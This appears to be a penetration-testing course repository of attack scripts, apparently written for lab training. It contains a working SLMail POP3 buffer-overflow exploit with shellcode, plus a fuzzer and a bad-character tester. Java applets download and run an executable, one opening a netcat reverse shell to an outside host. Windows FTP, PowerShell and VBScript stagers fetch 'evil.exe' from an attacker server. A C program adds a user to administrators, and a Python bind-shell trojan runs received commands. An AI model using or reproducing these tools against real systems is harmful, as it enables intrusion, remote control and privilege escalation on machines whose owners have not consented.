├── README.md
├── buffoverflow
├── pop3-pass-fuzz.py
├── slmail-pop3-badchartest.py
└── slmail-pop3.py
├── clientside
├── Java-nc-example.java
├── Java.java
├── java.html
└── manifest.txt
├── pingscan.sh
├── post
├── ftp-commands
├── powershell-download
├── setup-ftp.sh
└── wget-vbs
├── privesc
└── useradd.c
├── resolv.sh
├── scripts
└── bind-trojan.py
└── vrfy.py
/README.md:
--------------------------------------------------------------------------------
1 | # pwk
2 | pwk notes and scripts
3 |
--------------------------------------------------------------------------------
/buffoverflow/pop3-pass-fuzz.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 |
4 | # Create an array of buffers, while incrementing them.
5 |
6 | buffer=["A"]
7 | counter=100
8 | while len(buffer) <= 30:
9 | buffer.append("A"*counter)
10 | counter=counter+200
11 |
12 | for string in buffer:
13 | print "Fuzzing PASS with %s bytes" % len(string)
14 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
15 | connect=s.connect(('192.168.2.202',110))
16 | s.recv(1024)
17 | s.send('USER test\r\n')
18 | s.recv(1024)
19 | s.send('PASS ' + string + '\r\n')
20 | s.send('QUIT\r\n')
21 | s.close()
22 |
--------------------------------------------------------------------------------
/buffoverflow/slmail-pop3-badchartest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 |
5 | badchars = (
6 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13"
7 | "\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26"
8 | "\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39"
9 | "\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c"
10 | "\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
11 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72"
12 | "\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85"
13 | "\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
14 | "\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab"
15 | "\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe"
16 | "\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1"
17 | "\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4"
18 | "\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7"
19 | "\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
20 |
21 | #buffer = "A"*2606 + "B"*4 + "C"*(3500-2606-4)
22 | buffer = "A"*2606 + "B"*4 + badchars
23 |
24 |
25 | try:
26 | print "\nSending evil buffer..."
27 | s.connect(('192.168.2.202',110))
28 | data = s.recv(1024)
29 | s.send('USER username' +'\r\n')
30 | data = s.recv(1024)
31 | s.send('PASS ' + buffer +'\r\n')
32 | print "\nDone!."
33 | except:
34 | print "Could not connect to POP3!"
35 |
36 |
--------------------------------------------------------------------------------
/buffoverflow/slmail-pop3.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | import socket
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 |
5 | shellcode = ("\xfd\x18\xe1\x09\xe0\x05\x14\x93\xbb\x42\xd6\x3d\x1c\xb5\xb7"
6 | "\x48\xdd\xc5\xba\x70\x4a\x61\xe7\xd9\x74\x24\xf4\x5e\x31\xc9"
7 | "\xb1\x52\x31\x56\x17\x83\xc6\x04\x03\x26\x59\x83\x12\x3a\xb5"
8 | "\xc1\xdd\xc2\x46\xa6\x54\x27\x77\xe6\x03\x2c\x28\xd6\x40\x60"
9 | "\xc5\x9d\x05\x90\x5e\xd3\x81\x97\xd7\x5e\xf4\x96\xe8\xf3\xc4"
10 | "\xb9\x6a\x0e\x19\x19\x52\xc1\x6c\x58\x93\x3c\x9c\x08\x4c\x4a"
11 | "\x33\xbc\xf9\x06\x88\x37\xb1\x87\x88\xa4\x02\xa9\xb9\x7b\x18"
12 | "\xf0\x19\x7a\xcd\x88\x13\x64\x12\xb4\xea\x1f\xe0\x42\xed\xc9"
13 | "\x38\xaa\x42\x34\xf5\x59\x9a\x71\x32\x82\xe9\x8b\x40\x3f\xea"
14 | "\x48\x3a\x9b\x7f\x4a\x9c\x68\x27\xb6\x1c\xbc\xbe\x3d\x12\x09"
15 | "\xb4\x19\x37\x8c\x19\x12\x43\x05\x9c\xf4\xc5\x5d\xbb\xd0\x8e"
16 | "\x06\xa2\x41\x6b\xe8\xdb\x91\xd4\x55\x7e\xda\xf9\x82\xf3\x81"
17 | "\x95\x67\x3e\x39\x66\xe0\x49\x4a\x54\xaf\xe1\xc4\xd4\x38\x2c"
18 | "\x13\x1a\x13\x88\x8b\xe5\x9c\xe9\x82\x21\xc8\xb9\xbc\x80\x71"
19 | "\x52\x3c\x2c\xa4\xf5\x6c\x82\x17\xb6\xdc\x62\xc8\x5e\x36\x6d"
20 | "\x37\x7e\x39\xa7\x50\x15\xc0\x20\x9f\x42\xc8\x78\x77\x91\xcc"
21 | "\x79\x33\x1c\x2a\x13\x53\x49\xe5\x8c\xca\xd0\x7d\x2c\x12\xcf"
22 | "\xf8\x6e\x98\xfc\xfd\x21\x69\x88\xed\xd6\x99\xc7\x4f\x70\xa5"
23 | "\xfd\xe7\x1e\x34\x9a\xf7\x69\x25\x35\xa0\x3e\x9b\x4c\x24\xd3"
24 | "\x82\xe6\x5a\x2e\x52\xc0\xde\xf5\xa7\xcf\xdf\x78\x93\xeb\xcf"
25 | "\x44\x1c\xb0\xbb\x18\x4b\x6e\x15\xdf\x25\xc0\xcf\x89\x9a\x8a"
26 | "\x87\x4c\xd1\x0c\xd1\x50\x3c\xfb\x3d\xe0\xe9\xba\x42\xcd\x7d"
27 | "\x4b\x3b\x33\x1e\xb4\x96\xf7\x3e\x57\x32\x02\xd7\xce\xd7\xaf"
28 | "\xba\xf0\x02\xf3\xc2\x72\xa6\x8c\x30\x6a\xc3\x89\x7d\x2c\x38"
29 | "\xe0\xee\xd9\x3e\x57\x0e\xc8")
30 |
31 | buffer = "A"*2606 + "\x8f\x35\x4a\x5f" + shellcode +"C"*(3500-2606-4-351)
32 |
33 |
34 | try:
35 | print "\nSending evil buffer..."
36 | s.connect(('192.168.2.210',110))
37 | data = s.recv(1024)
38 | s.send('USER username' +'\r\n')
39 | data = s.recv(1024)
40 | s.send('PASS ' + buffer +'\r\n')
41 | print "\nDone!."
42 | except:
43 | print "Could not connect to POP3!"
44 |
45 |
--------------------------------------------------------------------------------
/clientside/Java-nc-example.java:
--------------------------------------------------------------------------------
1 | import java.applet.*;
2 | import java.awt.*;
3 | import java.io.*;
4 | import java.net.URL;
5 | import java.util.*;
6 | import java.net.URL;
7 |
8 | /**
9 | * Author: Offensive Security
10 | * This Java applet will download a file and execute it.
11 | **/
12 |
13 | public class Java extends Applet {
14 |
15 | private Object initialized = null;
16 | public Object isInitialized()
17 | {
18 | return initialized;
19 | }
20 | public void init() {
21 | Process f;
22 | try {
23 | String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
24 | String expath = tmpdir + "evil.exe";
25 | String download = "";
26 | download = getParameter("1");
27 | if (download.length() > 0) {
28 | // URL parameter
29 | URL url = new URL(download);
30 | // Get an input stream for reading
31 | InputStream in = url.openStream();
32 | // Create a buffered input stream for efficency
33 | BufferedInputStream bufIn = new BufferedInputStream(in);
34 | File outputFile = new File(expath);
35 | OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
36 | byte[] buffer = new byte[2048];
37 | for (;;) {
38 | int nBytes = bufIn.read(buffer);
39 | if (nBytes <= 0) break;
40 | out.write(buffer, 0, nBytes);
41 | }
42 | out.flush();
43 | out.close();
44 | in.close();
45 | f = Runtime.getRuntime().exec("cmd.exe /c " + expath +" 192.168.2.207 4444 -e cmd.exe");
46 | }
47 | } catch(IOException e) {
48 | e.printStackTrace();
49 | }
50 | /* ended here and commented out below for bypass */
51 | catch (Exception exception)
52 | {
53 | exception.printStackTrace();
54 | }
55 | }
56 | }
57 |
--------------------------------------------------------------------------------
/clientside/Java.java:
--------------------------------------------------------------------------------
1 | import java.applet.*;
2 | import java.awt.*;
3 | import java.io.*;
4 | import java.net.URL;
5 | import java.util.*;
6 | import java.net.URL;
7 |
8 | /**
9 | * Author: Offensive Security
10 | * This Java applet will download a file and execute it.
11 | **/
12 |
13 | public class Java extends Applet {
14 |
15 | private Object initialized = null;
16 | public Object isInitialized()
17 | {
18 | return initialized;
19 | }
20 | public void init() {
21 | Process f;
22 | try {
23 | String tmpdir = System.getProperty("java.io.tmpdir") + File.separator;
24 | String expath = tmpdir + "evil.exe";
25 | String download = "";
26 | download = getParameter("1");
27 | if (download.length() > 0) {
28 | // URL parameter
29 | URL url = new URL(download);
30 | // Get an input stream for reading
31 | InputStream in = url.openStream();
32 | // Create a buffered input stream for efficency
33 | BufferedInputStream bufIn = new BufferedInputStream(in);
34 | File outputFile = new File(expath);
35 | OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile));
36 | byte[] buffer = new byte[2048];
37 | for (;;) {
38 | int nBytes = bufIn.read(buffer);
39 | if (nBytes <= 0) break;
40 | out.write(buffer, 0, nBytes);
41 | }
42 | out.flush();
43 | out.close();
44 | in.close();
45 | f = Runtime.getRuntime().exec("cmd.exe /c " + expath);
46 | }
47 |
48 | } catch(IOException e) {
49 | e.printStackTrace();
50 | }
51 | /* ended here and commented out below for bypass */
52 | catch (Exception exception)
53 | {
54 | exception.printStackTrace();
55 | }
56 | }
57 | }
58 |
--------------------------------------------------------------------------------
/clientside/java.html:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/clientside/manifest.txt:
--------------------------------------------------------------------------------
1 | Permissions: all-permissions
2 |
--------------------------------------------------------------------------------
/pingscan.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | for ip in $(seq 1 125); do
4 | ping -c 1 192.168.2.$ip |grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
5 | done
6 | for ip2 in $(seq 126 254); do
7 | ping -c 1 192.168.2.$ip2 |grep "bytes from" |cut -d" " -f4 |cut -d":" -f1 &
8 | done
9 |
--------------------------------------------------------------------------------
/post/ftp-commands:
--------------------------------------------------------------------------------
1 | echo open 192.168.2.200 21> ftp.txt
2 | echo offsec>> ftp.txt
3 | echo evilftp>> ftp.txt
4 | echo bin >> ftp.txt
5 | echo GET evil.exe >> ftp.txt
6 | echo bye >> ftp.txt
7 | ftp -s:ftp.txt
8 |
9 |
--------------------------------------------------------------------------------
/post/powershell-download:
--------------------------------------------------------------------------------
1 | echo $storageDir = $pwd > wget.ps1
2 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1
3 | echo $url = "http://192.168.2.200/exploit.exe" >>wget.ps1
4 | echo $file = "new-exploit.exe" >>wget.ps1
5 | echo $webclient.DownloadFile($url,$file) >>wget.ps1
6 |
--------------------------------------------------------------------------------
/post/setup-ftp.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | groupadd ftpgroup
4 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
5 | pure-pw useradd offsec -u ftpuser -d /ftphome
6 | pure-pw mkdb
7 | cd /etc/pure-ftpd/auth/
8 | ln -s ../conf/PureDB 60pdb
9 | mkdir -p /ftphome
10 | chown -R ftpuser:ftpgroup /ftphome/
11 | /etc/init.d/pure-ftpd restart
12 |
--------------------------------------------------------------------------------
/post/wget-vbs:
--------------------------------------------------------------------------------
1 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs
2 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
3 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
4 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
5 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
6 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
7 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
8 | echo Err.Clear >> wget.vbs
9 | echo Set http = Nothing >> wget.vbs
10 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
11 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
12 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
13 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
14 | echo http.Open "GET", strURL, False >> wget.vbs
15 | echo http.Send >> wget.vbs
16 | echo varByteArray = http.ResponseBody >> wget.vbs
17 | echo Set http = Nothing >> wget.vbs
18 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
19 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
20 | echo strData = "" >> wget.vbs
21 | echo strBuffer = "" >> wget.vbs
22 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
23 | echo ts.Write Chr(255 and Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
24 | echo Next >> wget.vbs
25 | echo ts.Close >> wget.vbs
26 |
27 |
--------------------------------------------------------------------------------
/privesc/useradd.c:
--------------------------------------------------------------------------------
1 | #include
2 | int main ()
3 | {
4 | int i;
5 | i=system ("net localgroup administrators lowpriv /add");
6 | return 0;
7 | }
8 |
9 |
--------------------------------------------------------------------------------
/resolv.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | if [ -z "$1" ]; then
4 | echo "[*] Resolves dns name of ip addresses"
5 | echo "[*] Usage: $0 "
6 | exit 0
7 | fi
8 |
9 | for ip in $(cat $1); do
10 | nslookup $ip |grep "name" |cut -d" " -f3 && echo $ip;
11 | done
12 |
--------------------------------------------------------------------------------
/scripts/bind-trojan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import socket
4 | import subprocess
5 |
6 | host = '0.0.0.0'
7 | port = 4444
8 |
9 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
10 | s.bind((host,port))
11 | while 1:
12 | client, address = s.accept()
13 | client.send("[+] Welcome Master\r\n\r\n>")
14 | data = client.recv(1024)
15 | if data:
16 | proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
17 | data = proc.stdout.read() + proc.stderr.read()
18 | client.send(data)
19 | client.close()
20 |
--------------------------------------------------------------------------------
/vrfy.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import socket
4 | import sys
5 |
6 | if len(sys.argv) != 3:
7 | print "Usage: vrfy.py "
8 | sys.exit(0)
9 |
10 | s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Create a Socket
11 | connect=s.connect((sys.argv[1],25)) # Connect to the Server
12 | banner=s.recv(1024) # Receive the banner
13 | print banner
14 | f = open(sys.argv[2], 'r') # open file, read only
15 | for user in f: # loop over list
16 | s.send('VRFY ' + user) #VRFY a user
17 | result=s.recv(1024)
18 | print result
19 | s.close() # Close the socket
20 |
--------------------------------------------------------------------------------